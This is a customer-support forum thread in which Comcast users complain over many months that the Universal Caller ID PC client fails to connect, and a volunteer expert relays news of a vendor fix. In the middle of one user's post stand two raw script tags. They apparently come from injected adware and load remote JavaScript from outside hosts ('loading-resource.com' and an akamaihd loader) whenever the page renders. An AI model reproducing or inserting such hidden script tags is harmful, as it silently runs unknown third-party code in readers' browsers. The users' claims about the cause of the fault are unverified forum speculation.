Contributor
ziollie4216

Re: Universal Caller ID Not Working on PC

for one month i ask for help with caller id on my pc ur are a joke no help at all!

Contributor
Wallly200796

I have been a comcast subscriber for quite some time, and I am getting quite disgusted  with this callerid issue. I've been dealing with this issue off and on for practically a year now. I was waiting on the socalled high echelon tech since early in the week.  I got a call about a hour ago and mentioned that I would be receiving a call Tuesday.  I'm hopeing what you mentioned about October, that they have been working on the fix. and will should have it done in Oct. Does your callerid icon and window fluctuate off and on (Connect Disconnect??)

I've also picked up the new gateway wireless battery back up modem, I thought that it would be the resolve, however no luck.  I'll advise what happens after I get the call Tuesday.  In the mean time I will be voicing my displeasure with customer service.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
New Visitor
fugit

i have been waiting since april 2012 for caller id on computer to work... it was working before then .. why would anyome use xfinity for house potection if comcast infinity can not fix caller id?

Visitor
bogaseme

Well it is October and still waiting for an answer about caller ID on PC not working

Regular Contributor

bogaseme wrote:

Well it is October and still waiting for an answer about caller ID on PC not working

The fix will be available October but Comcast has not said what year!:smileywink:

Visitor
kww713

same here ..... endless hours with tech on chat and still won't stay connected 

Regular Contributor
owlynagain

The fix is not ready for release yet. I will have another update by November 3rd.

Contributor
ziollie4216

this is  an joke never fix the caller ID    comcast charger big buck for noting

Regular Contributor

bogaseme wrote:

Wel, we got our reply.  There has been no progress to report and it will be November before we even hear anything!  Great job, Comcast!

Regular Contributor

Actually, this problem has gone from bad to doesn't work at all.  I think it was around a month ago that Comcast had an updated version to the caller ID on my PC.  Since that latest version, it doesn't work at all.  Most of the time, it will not connect, and when it does, I don't get any display of any incoming calls.  I first reported problems with the PC caller ID probably a year ago. 

Regular Contributor
owlynagain

A new patch has been provided by the vendor, and Comcast engineering is currently testing it. If it passes, it will be released, Comcast will not release a broken fix this time.

Visitor
jaywilson

What kind of a time frame can we expect befor the new beta version of caller ID is released?????

Regular Contributor
owlynagain

It won't be a beta, it will be a production release, and there will probably not be a client update. The fix (so far) is only on the server side. There is no date, as no one knows what will be found in the test. If it is working properly, I would GUESS sometime in January.

Contributor
ziollie4216

it been 6# month still no PC  ID want an joke

Visitor
jaywilson

That's funny!!!!  Well maybe not. As I was reading this last post, a call came in and it DID SHOW on my computer screen. :smileyblush: :smileylove:

Good luck everyone else.

Contributor
Dumaine

[ Edited ]

Very interesting.....I just reinstalled the AIR update then reinstalled  UCID and it worked

New Visitor
fugit

Darn I have tried everything  comcast promised since April 2012 that caller id would work ... hahaha .... Still not working ... And they want u to buy their security for home thru computer  r u kidding ... When they can't get caller id to work on the computer  ...wake up and smell the roses .. comcast unable to fix problems 

Regular Contributor
owlynagain

[ Edited ]

Dumaine,

Don't worry, it will break again. It is not an Adobe Air or a client problem.

New Visitor
rfdembek

I've had a problem with this most of this year.  Called comcast support and wasted hours.  For a while it worked on one PC but not the other.  Now it doesn't work on either.  No popup when a phone call arrives.  Running Windows 7 on both PCs.   uninstalled/installed air and callerid software several times.  I asked comcast support to escalate this and got a barely intelligible call where the person said I would have to  pay $70 or so to have my PC analyzed from remote.  Absolutely outrageous.

New Visitor
Dreamweaver4008

I have the same sign on problem. I cannot sign in the pc id svc but I CAN sign in on my acct page. I'll either get the error msg that someone posted or login failed. I KNOW the correct id. Most of my svcs do not work.

Also when you added the queue system to the DVR, it will not allow you to switch channels and expect to get back to where you stopped. 

Contributor
jpf_37

I finally got smart and decided to use the ultimate solution for this Universal Caller ID problem: 

I uninstalled it - no more problems!

(And if Comcast doesn't get their act together soon, I'll be uninstalling them as my internet/TV/phone service provider).

New Visitor
Dreamweaver4008

I am in agreement. My service has never completely worked as advertised.

New Visitor
Dreamweaver4008

I received an email that said if I clicked on the link, I would see a response. I didn't and it still doesnt work..

New Visitor
fugit

darn .. it is still not working  why do they not take it down for the internet .. they have not been able to fix it in2 years what a joke

Contributor
AtcoDummy

I downloaded the new latest greatest about 2 hours ago. It works when first connected. However, give it an hour or so and it will disconnect - even though it's little control gadget says it is connected. Looks like the same old, same old to me. About time Comcast-Xfinity hired themselves some programmers with a little advanced training - particularly in debugging.

Running Windows 7 with ALL of the updates installed.

Contributor
ziollie4216

this B.S. has not work in two year's what a joke!

New Visitor
anthonywalker41

PC callerid not showing up my computer

My caller id is not showing up on my computer.

New Visitor
anthonywalker41

reinstall pc caller id

Reinstall pc callerid but still no luck

New Visitor
geobabe

Re: PC callerid not showing up my computer

I'm having the same problem.

New Visitor

Having same problem? Anybody know a fix?

New Visitor
mrboxmaker

Mine don't work most times either.

New Visitor
tanny135

Re: reinstall pc caller id

still does not work

New Visitor
tanny135

still does not work???????????????

New Visitor
tanny135

still does not work, can i get a refund?????

New Visitor
tanny135

Re: Caller ID on Mac

CAN YOU PLEASE GIVE ME THE NUMBER TO CALL I AM HAVING THE SAME PROBLEM. I CALLED COMCAST,BUT THEY COULD NOT HELP ME???

New Visitor
tanny135

I AM USING A MAC??? CANT CONNECT!!!

New Visitor
tanny135

STILL NOT WORKING??????

New Visitor
rfdembek

This is still not working for me!  Will this ever be fixed? 

New Visitor
landlord4

This has been an ongoing problem for over a year ! Is it ever going to be working properly ? It shows up on my TV, but nothing on my PC .

Regular Contributor
owlynagain

The good news is that Comcast is working on it. The bad news is that the fix still has not made it out of testing. They keep having problems. I will post in this forum when the fix is ready.

New Visitor

Comcast/Xfinity, when are you going to fix this PC caller id ?

It has been over a year, this is disgusting customer service !!!!!

Also  why did you and what gives you the right to lock the previous thread ?

http://forums.comcast.com/t5/Universal-Caller-ID/PC-Caller-ID-Update/td-p/1227699

I do not see you "" being shown as a moderator or as the original poster.

What is out of control is the fact that this service that is paid for has not worked in over a year.

Cable Expert
Re: PC Caller ID Update

‎06-24-2012 02:03 PM

Thread is out of control and is now locked

Regular Contributor
owlynagain

[ Edited ]

I have inside information on this. Comcast has been working on this for about 10 months. The problem was due to code from a third-party vendor who was responsible for the Caller ID features. The code was part of a patch that went in last April. I believe the patch had something to do with either TV caller ID or smartphone caller ID. In any event, that is what broke the PC caller ID.

After several failed attempts at this vendor fixing the code, Comcast secured another vendor to take over. This was in the late fall. The new vendor has come very close to a successful fix, but the last version still failed testing. A more recent version is ready for testing, or is in testing, and if it passes, the fix will be released.

The last word I had was that no new software will need to be downloaded to users' PCs. The fix is on the server side.

When I hear that the new version will be released, I'll post back to the forum. Note that it may be that the fix will be in place before I am notified.

New Visitor

[ Edited ]

I just wanted to note that I have tried installing the software in both the 32 bit "program files" and the 64 bit "program files (X86), as I run Windows 7 64, in the 32 bit program file the software would not load properly and gave the " the Appiction has failed to lauch" message, when I downloaded to the 64 bit "program files (X86)" files the software loads and attemps a login, but then login fails.

on a side note, why do I keep getting this message, even with just plain text ?

"Your post has been changed because invalid HTML was found in the message body"

And also why can't I attach any photos like Keri1974 did in message #5 of this thread ?

http://images2.snapfish.com/232323232%7Ffp54388%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D36524786%3A7348...

http://images3a.snapfish.com/232323232%7Ffp734%3B4%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D365249967534...

http://images3a.snapfish.com/232323232%7Ffp734%3A4%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D365249968634...

http://images3a.snapfish.com/232323232%7Ffp73486%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D36524%3A488534...

http://images3a.snapfish.com/232323232%7Ffp73474%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D36524%3A488634...

http://images3a.snapfish.com/232323232%7Ffp73474%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D36524%3A488834...

http://images2.snapfish.com/232323232%7Ffp543%3A3%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D36524%3A48893...

http://images2.snapfish.com/232323232%7Ffp5435%3A%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D36524%3A488%3...

http://images3a.snapfish.com/232323232%7Ffp73498%3Enu%3D7697%3E7%3C7%3E257%3EWSNRCG%3D3652499688348n...

Cable Expert
JayInAlg

PhattEddie

Check this link to find out who is a Volunteer Expert on the forum by the Comcast forum Administrator.  I, along with 25 others was chosen to post and answer in Comcast's behalf and escalate as necessary.

Everyone should go over all links in the Forum Guidelines section.

Contributor
ziollie4216

so what new's it been two year! not working

New Visitor

Yes I did read it before I made my post, and yes you are listed as a "volunteer", so are you stating that you are in fact a moderator, as on every forum I am a member on only the mod's or the original poster can lock someone's thread...

Besides all that, where are the answers to the post you locked and this one, if you have been chosen as you say, did you escalate either of these, and where are comcast's comments ?

Thank You

JJJ

Regular Contributor

I don't know how Comcast has determined that the client software is not a problem since they have not gotten a fix yet.  The problems started when there was a client "update" last March and Comcast, instead of going back to the working software, released 3 or 4 client updates and an unknown number of server updates all of which made the problem progressively worse.

All this time, the iPad software was rock solid using, I assume, the same servers.  If that is the case, then it's obviously the fault of the client software and they're barking up the wroong tree by concentrating on the server.

It's interesting that Comcast now says they ditched the original vendor late last fall.  An engineer told me about a month or two ago they had not made the decision to hire a different company to fix the problem!  He also claimed that the reason they did not go back to the working version was that it fixed more pressing problems.  He refused to discuss what problems were fixed.

After a year of lies, I don't trust anything Comcast says about the problem.

Regular Contributor
owlynagain

I believe my information is better. I know the names of the two vendors. Also, the real reason they couldn't go back to the prior version is that no one kept the prior code, and by the time they realized there was a problem, it was too late to restore from a backup (the backups were gone).

I am in I.T., and can knowlegeably state that your conclusion about server vs client code is not necessarily correct. Yes, the iPhone app works amazingly well, and the TV app works very well for most people. The code that nhandles the PC is integrated with the other code, and it just doesn't work properly. That's why the fix is taking so long- fixing this (PC CID) can break something else (like the iPhone functionality).

Is it taking an incredibly long time? Yes. Did Comcast handle well? No, not at all., They failed miserably in several areas. Do I believe them? Well, I believe the person I am in touch with.